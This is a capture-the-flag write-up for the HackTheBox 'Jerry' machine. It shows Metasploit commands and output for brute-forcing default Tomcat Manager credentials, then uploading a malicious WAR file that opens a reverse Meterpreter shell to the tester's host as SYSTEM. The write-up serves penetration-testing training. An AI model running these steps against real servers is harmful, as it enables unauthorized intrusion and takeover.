HackTheBox Jerry
Writeup for HackTheBox Jerry
Machine Synopsis
IP Address: 10.129.136.9
Key Exploitation Techniques:
- Credential Brute-Force: Discovering default credentials for the Apache Tomcat Manager application.
- Web Application Deployment: Gaining remote code execution by uploading a malicious WAR file via the Tomcat Manager.
- Immediate SYSTEM Access: The Tomcat service runs with
NT AUTHORITY\SYSTEMprivileges, granting an immediate root shell.
1. Enumeration
Initial reconnaissance with nmap revealed a single open port.
1
nmap -p- --min-rate 1000 -T4 10.129.136.9 -oN nmap_portscan.txt
A more detailed service scan confirmed the service running on port 8080.
1
nmap -sC -sV -p 8080 -T4 10.129.136.9 -oN nmap_services.txt
Nmap Results:
- Port 8080 (HTTP): The service is identified as
Apache Tomcat/7.0.88, a popular open-source web server used to deploy Java applications.
Navigating to http://10.129.136.9:8080 displays the default Tomcat landing page. The Manager App link leads to a login prompt.
2. Exploitation
Step 2.1: Credential Brute-Force
The Apache Tomcat Manager requires authentication. Since a login prompt appeared and we did not have a valid set of credentials, we assumed that default or weak credentials might be in use.
The Metasploit module auxiliary/scanner/http/tomcat_mgr_login automates this process by attempting a list of default and common credentials.
1
2
3
4
5
msfconsole -q
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.129.136.9
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8080
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
The scan successfully found a valid credential pair: tomcat:s3cret.
1
[+] 10.129.136.9:8080 - Login Successful: tomcat:s3cret
Step 2.2: Deploying a Malicious Web Application
The Tomcat Manager allows for the deployment of new applications by uploading a WAR (Web Application Archive) file. A WAR file is a compressed package of Java web application files. By creating a malicious WAR file, we can get the server to execute our code.
The Metasploit module exploit/multi/http/tomcat_mgr_upload automates the entire process: it generates a malicious payload, wraps it in a WAR file, uploads it to the Tomcat Manager, and triggers the payload to obtain a shell.
1
2
3
4
5
6
7
8
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.129.136.9
msf6 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set lhost tun0
msf6 exploit(multi/http/tomcat_mgr_upload) > set lport 4444
msf6 exploit(multi/http/tomcat_mgr_upload) > exploit
The exploit ran successfully and established a Meterpreter session. The getuid command immediately revealed that the Tomcat service was running with NT AUTHORITY\SYSTEM privileges, granting us a root shell.
meterpreter > getuid
Server username: JERRY$
This is a common misconfiguration in older Windows systems, as services are often unnecessarily run with administrative privileges.
3. Flag Retrieval
With a SYSTEM shell, we were able to navigate to the desktop and locate the flags.
meterpreter > shell
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
nt authority\system
C:\apache-tomcat-7.0.88>dir "C:\Users\Administrator\Desktop\flags"
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 2,419,658,752 bytes free
C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt
user.txt
<redacted>
root.txt
<redacted>